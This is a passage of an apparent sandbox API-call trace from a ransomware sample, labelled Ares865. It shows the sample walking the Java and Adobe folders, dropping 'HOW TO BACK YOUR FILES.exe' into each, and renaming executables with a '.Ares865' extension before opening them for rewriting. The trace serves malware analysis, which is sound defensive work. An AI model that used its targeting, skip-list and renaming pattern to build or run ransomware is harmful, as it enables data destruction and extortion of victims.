(hObject=0x120) returned 1 [0151.850] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0151.850] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0151.850] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Java\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x801ae160, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x5389dbc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5389dbc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0151.850] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0151.850] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0151.851] lstrcpyW (in: lpString1=0x2cce452, lpString2="Java Update" | out: lpString1="Java Update") returned="Java Update" [0151.851] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7908 [0151.851] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x6a) returned 0x2e4710 [0151.851] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7910 | out: ListHead=0x2e7710, ListEntry=0x2e7910) returned 0x2e78f0 [0151.851] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x801d42c0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x538e9e80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x538e9e80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Java Update", cAlternateFileName="JAVAUP~1")) returned 0 [0151.851] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0151.851] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7910 [0151.851] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\Java\\Java Update", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Java\\Java Update") returned="C:\\Program Files (x86)\\Common Files\\Java\\Java Update" [0151.851] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0151.851] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7908 | out: hHeap=0x2b0000) returned 1 [0151.851] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Java\\Java Update") returned 52 [0151.851] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Java\\Java Update" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Java\\Java Update") returned="C:\\Program Files (x86)\\Common Files\\Java\\Java Update" [0151.851] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0151.851] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\java\\java update\\how to back your files.exe"), bFailIfExists=1) returned 0 [0151.852] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0151.852] GetLastError () returned 0x0 [0151.852] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0151.852] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0151.852] CloseHandle (hObject=0x120) returned 1 [0151.853] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0151.853] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0151.853] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x801d42c0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x538e9e80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x538e9e80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0151.853] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0151.853] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0151.853] lstrcpyW (in: lpString1=0x2cce46a, lpString2="jaucheck.exe" | out: lpString1="jaucheck.exe") returned="jaucheck.exe" [0151.853] lstrlenW (lpString="jaucheck.exe") returned 12 [0151.853] lstrlenW (lpString="Ares865") returned 7 [0151.853] lstrcmpiW (lpString1="eck.exe", lpString2="Ares865") returned 1 [0151.853] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jaucheck.exe.Ares865") returned 73 [0151.853] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jaucheck.exe" (normalized: "c:\\program files (x86)\\common files\\java\\java update\\jaucheck.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jaucheck.exe.Ares865" (normalized: "c:\\program files (x86)\\common files\\java\\java update\\jaucheck.exe.ares865"), dwFlags=0x1) returned 1 [0151.855] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jaucheck.exe.Ares865" (normalized: "c:\\program files (x86)\\common files\\java\\java update\\jaucheck.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0151.855] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=248704) returned 1 [0151.855] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0151.855] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0151.855] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0151.871] lstrcpyW (in: lpString1=0x2cce46a, lpString2="jaureg.exe" | out: lpString1="jaureg.exe") returned="jaureg.exe" [0151.871] lstrlenW (lpString="jaureg.exe") returned 10 [0151.871] lstrlenW (lpString="Ares865") returned 7 [0151.871] lstrcmpiW (lpString1="reg.exe", lpString2="Ares865") returned 1 [0151.871] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jaureg.exe.Ares865") returned 71 [0151.871] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jaureg.exe" (normalized: "c:\\program files (x86)\\common files\\java\\java update\\jaureg.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jaureg.exe.Ares865" (normalized: "c:\\program files (x86)\\common files\\java\\java update\\jaureg.exe.ares865"), dwFlags=0x1) returned 1 [0151.873] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jaureg.exe.Ares865" (normalized: "c:\\program files (x86)\\common files\\java\\java update\\jaureg.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0151.873] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=235392) returned 1 [0151.873] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0151.873] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0151.873] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0152.016] lstrcpyW (in: lpString1=0x2cce46a, lpString2="jucheck.exe" | out: lpString1="jucheck.exe") returned="jucheck.exe" [0152.016] lstrlenW (lpString="jucheck.exe") returned 11 [0152.016] lstrlenW (lpString="Ares865") returned 7 [0152.016] lstrcmpiW (lpString1="eck.exe", lpString2="Ares865") returned 1 [0152.017] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jucheck.exe.Ares865") returned 72 [0152.017] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jucheck.exe" (normalized: "c:\\program files (x86)\\common files\\java\\java update\\jucheck.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jucheck.exe.Ares865" (normalized: "c:\\program files (x86)\\common files\\java\\java update\\jucheck.exe.ares865"), dwFlags=0x1) returned 1 [0152.020] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jucheck.exe.Ares865" (normalized: "c:\\program files (x86)\\common files\\java\\java update\\jucheck.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0152.020] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=507264) returned 1 [0152.020] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0152.020] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0152.020] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0152.135] lstrcpyW (in: lpString1=0x2cce46a, lpString2="jusched.exe" | out: lpString1="jusched.exe") returned="jusched.exe" [0152.135] lstrlenW (lpString="jusched.exe") returned 11 [0152.135] lstrlenW (lpString="Ares865") returned 7 [0152.135] lstrcmpiW (lpString1="hed.exe", lpString2="Ares865") returned 1 [0152.135] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jusched.exe.Ares865") returned 72 [0152.135] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jusched.exe" (normalized: "c:\\program files (x86)\\common files\\java\\java update\\jusched.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jusched.exe.Ares865" (normalized: "c:\\program files (x86)\\common files\\java\\java update\\jusched.exe.ares865"), dwFlags=0x1) returned 1 [0152.138] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jusched.exe.Ares865" (normalized: "c:\\program files (x86)\\common files\\java\\java update\\jusched.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0152.138] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=254336) returned 1 [0152.138] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0152.139] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0152.139] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0152.168] lstrcpyW (in: lpString1=0x2cce46a, lpString2="task.xml.Ares865" | out: lpString1="task.xml.Ares865") returned="task.xml.Ares865" [0152.168] lstrlenW (lpString="task.xml.Ares865") returned 16 [0152.168] lstrlenW (lpString="Ares865") returned 7 [0152.168] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0152.168] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfeb63a00, ftCreationTime.dwHighDateTime=0x1ce76b0, ftLastAccessTime.dwLowDateTime=0x80220580, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x538e9e80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x890, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="task64.xml.Ares865", cAlternateFileName="TASK64~1.ARE")) returned 1 [0152.168] lstrcmpiW (lpString1="task64.xml.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0152.169] lstrcmpiW (lpString1="task64.xml.Ares865", lpString2="aoldtz.exe") returned 1 [0152.169] lstrcpyW (in: lpString1=0x2cce46a, lpString2="task64.xml.Ares865" | out: lpString1="task64.xml.Ares865") returned="task64.xml.Ares865" [0152.169] lstrlenW (lpString="task64.xml.Ares865") returned 18 [0152.169] lstrlenW (lpString="Ares865") returned 7 [0152.169] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0152.169] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfeb63a00, ftCreationTime.dwHighDateTime=0x1ce76b0, ftLastAccessTime.dwLowDateTime=0x80220580, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x538e9e80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x890, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="task64.xml.Ares865", cAlternateFileName="TASK64~1.ARE")) returned 0 [0152.169] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0152.169] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e78f0 [0152.169] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe") returned="C:\\Program Files (x86)\\Common Files\\Adobe" [0152.169] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2df710 | out: hHeap=0x2b0000) returned 1 [0152.169] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e78e8 | out: hHeap=0x2b0000) returned 1 [0152.169] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe") returned 41 [0152.169] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe") returned="C:\\Program Files (x86)\\Common Files\\Adobe" [0152.169] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0152.169] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\how to back your files.exe"), bFailIfExists=1) returned 0 [0152.170] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0152.171] GetLastError () returned 0x0 [0152.171] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0152.171] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0152.172] CloseHandle (hObject=0x120) returned 1 [0152.172] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0152.172] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0152.172] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf1a9e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x538e9e80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x538e9e80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0152.172] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0152.172] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0152.172] lstrcpyW (in: lpString1=0x2cce454, lpString2="Acrobat" | out: lpString1="Acrobat") returned="Acrobat" [0152.173] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e78e8 [0152.173] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x64) returned 0x2d2ef0 [0152.173] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e78f0 | out: ListHead=0x2e7710, ListEntry=0x2e78f0) returned 0x2e78d0 [0152.173] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8386f760, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53a8cda0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53a8cda0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ARM", cAlternateFileName="")) returned 1 [0152.173] lstrcmpiW (lpString1="ARM", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0152.173] lstrcmpiW (lpString1="ARM", lpString2="aoldtz.exe") returned 1 [0152.173] lstrcpyW (in: lpString1=0x2cce454, lpString2="ARM" | out: lpString1="ARM") returned="ARM" [0152.173] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7908 [0152.173] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x5c) returned 0x2f1fc8 [0152.173] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7910 | out: ListHead=0x2e7710, ListEntry=0x2e7910) returned 0x2e78f0 [0152.173] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d580500, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x5390ffe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5390ffe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HelpCfg", cAlternateFileName="")) returned 1 [0152.173] lstrcmpiW (lpString1="HelpCfg", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0152.173] lstrcmpiW (lpString1="HelpCfg", lpString2="aoldtz.exe") returned 1 [0152.173] lstrcpyW (in: lpString1=0x2cce454, lpString2="HelpCfg" | out: lpString1="HelpCfg") returned="HelpCfg" [0152.173] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7928 [0152.173] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x64) returned 0x2d2f60 [0152.173] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7930 | out: ListHead=0x2e7710, ListEntry=0x2e7930) returned 0x2e7910 [0152.173] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x538e9e80, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x538e9e80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0152.173] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0152.173] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x538e9e80, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x538e9e80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0152.173] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0152.174] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7930 [0152.174] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg" [0152.174] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f60 | out: hHeap=0x2b0000) returned 1 [0152.174] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7928 | out: hHeap=0x2b0000) returned 1 [0152.174] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg") returned 49 [0152.174] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg" | out: lpString1="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg") returned="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg" [0152.174] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0152.174] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\how to back your files.exe"), bFailIfExists=1) returned 0 [0152.175] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0152.175] GetLastError () returned 0x0 [0152.175] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0152.175] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0152.175] CloseHandle (hObject=0x120) returned 1 [0152.175] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0152.175] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0152.175] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d580500, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x5390ffe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5390ffe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0152.175] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0152.175] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0152.176] lstrcpyW (in: lpString1=0x2cce464, lpString2="ca_ES" | out: lpString1="ca_ES") returned="ca_ES" [0152.176] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7928 [0152.176] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x70) returned 0x2e4710 [0152.176] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7930 | out: ListHead=0x2e7710, ListEntry=0x2e7930) returned 0x2e7910 [0152.176] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5f2920, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53a66c40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53a66c40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cs_CZ", cAlternateFileName="")) returned 1 [0152.176] lstrcmpiW (lpString1="cs_CZ", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0152.176] lstrcmpiW (lpString1="cs_CZ", lpString2="aoldtz.exe") returned 1 [0152.176] lstrcpyW (in: lpString1=0x2cce464, lpString2="cs_CZ" | out: lpString1="cs_CZ") returned="cs_CZ" [0152.176] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7948 [0152.176] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x70) returned 0x2e4788 [0152.176] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7950 | out: ListHead=0x2e7710, ListEntry=0x2e7950) returned 0x2e7930 [0152.176] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d580500, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53a66c40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53a66c40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, 